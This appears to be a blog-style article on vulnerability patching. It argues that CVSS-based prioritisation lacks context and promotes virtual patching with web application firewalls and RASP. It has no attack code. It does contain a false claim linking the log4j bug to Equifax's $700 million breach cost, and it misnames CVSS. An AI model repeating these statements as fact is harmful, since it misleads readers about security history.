Software vulnerabilities are an ever-growing threat. Each CVE publication seems to indicate yet another ticking time bomb, and the weight on security professionals is growing faster than the backlog of patches awaiting implementation. The fatal flaw of the patching process is a complete lack of severity indicators, leaving organizations in the dark as to the on-the-ground effects of each security flaw. Here’s how a web application firewall and reprioritization can completely revitalize your organization’s approach to vulnerability management.
The Growing Threat of Production Vulnerabilities
2021 saw the highest number of software vulnerabilities on record, with an almost 10% increase from 2020’s total of 18,351. In 2021, over 25,000 different software products were shipped with vulnerabilities, potentially disrupting the security defenses of millions of customers and organizations. The good news, however, is that 2021’s high-severity vulnerabilities actually decreased in number, from 4,378 to 4,063. This is the first such decrease in 5 years, and DevOps must work hard to continue this trend into 2022.
One trend that 2021 continued to define is that of attack complexity. Low complexity attacks rose in number once again, making up 94% of all attacks in 2021. These low-intricacy attacks are defined by an attack chain that is easily repeatable. Regularly launched by bots and script kiddies, these attacks represent an easy way for cyber criminals to gain a footing in your organization’s defenses. High complexity attacks, on the other hand, often see the criminal’s attack path relying on circumstances outside of their own control. Representing 88% of 2020’s attacks, cyber criminals are reaping the rewards of increasingly low effort.
The vast majority of 2021’s vulnerabilities were executable without any inside accompaniment. However, a third of vulnerabilities registered in the study did require an unwitting insider to lend the attacker control. The range of attack vectors within this year in review displays a few weaknesses with relying purely on figures alone. Patching and maintaining every single vulnerable software is an immense drain on resources: cybersecurity strategy needs to to keep up with the modern vulnerability hyper growth.
How Your Patching Benefits From Reprioritization
Vulnerable software is only a threat when that software remains unpatched. The logical action to shore up an organization’s defenses, therefore, is to simply issue the patches. However, keeping up with vulnerability patching is intensely challenging. Cybersecurity teams remain understaffed and overworked, making the mantra of ‘always keep all software up-to-date’ hopelessly optimistic for departments who simply don’t have the resources. The sheer quantity of patches is compounded by the lack of true insight into the real-life consequences of each weakness. In search of adding methods to the madness, admins have turned to the severity rating of Common Vulnerability Severity Scale (CVSS) scores.
However, this approach could actually be exacerbating the underlying issue. In prioritizing those patches in order of CVSS score, the prioritization of these patches is completely lacking in context. CVSS may seem promising – knowing about a high-severity remote code execution flaw is vital, after all – CVSS provides no context on whether that flaw is actually likely to be utilized by an attacker. It doesn’t indicate whether the flaw is present in 15 systems or 15 million, or whether publicly accessible servers are affected. Attackers are increasingly relying on low-effort attacks, thanks to the increased ROI presented by such. The resource-intensive patching processes that organizations employ are not even aligned with the attack approaches facing them. Already-limited resources are now being spent on bugs that are unlikely to ever be exploited.
The weakness presented by an indiscriminate and mismanaged patch process demands solutions. Recently, a team of university researchers developed a model named Expected Exploitability. Trained on data from over two dozen sources, this prediction tool addresses not only the severity of each flaw, but also judges how likely each vulnerability is to be used in real life. Expected Exploitability identified 60% of the vulnerabilities that represented functional risks of exploit, with a precision of 86%. Particularly important to this model’s accuracy is the flexibility of its input data. Recognizing that not all relevant information is available when a vulnerability is first disclosed, the researchers took an adaptive approach, adding to the model’s accuracy as further information is released.
Even cutting-edge predictive models, however, cannot solve all of the issues presented with patching. Faulty patches are increasingly common, as displayed in the post-breach log4j fiasco. In this, it took multiple attempts for Apache to release the patch to the bug that cost Equifax alone over $700 million. Faulty patches mean that not only do vulnerabilities prevail, but security teams are also thrown off the scent – meaning organizations miscalculate their own risk.
Managing vulnerability risk
Virtual patching describes the deployment of a short-term, rapid-fire security policy, focusing on protecting an application before its official patch is released. Virtual patching is particularly important for mission critical systems which need to remain online. In these situations, certain tools can help protect pieces of software without any changes made to the underlying source code. One of these tools is a web application firewall (WAF).
A WAF sits at the perimeter of an application, analyzing the transactions that occur between its software and the public-facing internet. The WAF protects its web apps by filtering, monitoring, and blocking the HTTP/S traffic traveling to the web application. In this way, unauthorized data is prevented from leaving the app. This is achieved by implementing policies, which allow it to determine how malicious traffic acts. The WAF is a good first step toward a strong virtual patch layer: the speed and ease with which new policies can be implemented makes it highly adaptable. For example, rate limiting can be implemented via WAF, which helps battle Distributed Denial of Service (DDoS) attacks.
Whereas a WAF sits adjacent to an application, Runtime Application Self Protection (RASP) wraps around an application, monitoring its behaviors whenever the app is in use. When a security event occurs within the app, RASP takes control, triggering a number of actions. In diagnostic mode, RASP will simply notify you that something is amiss. If placed in protection mode, RASP actively shuts down the actions identified as unorthodox or unexpected.
Patching doesn’t need to be a nightmare. Alongside maintaining a strong and adaptive layer of protection, virtual patches can keep critical pieces of infrastructure away from cybercriminals, while saving you the drawn-out wait for an official patch.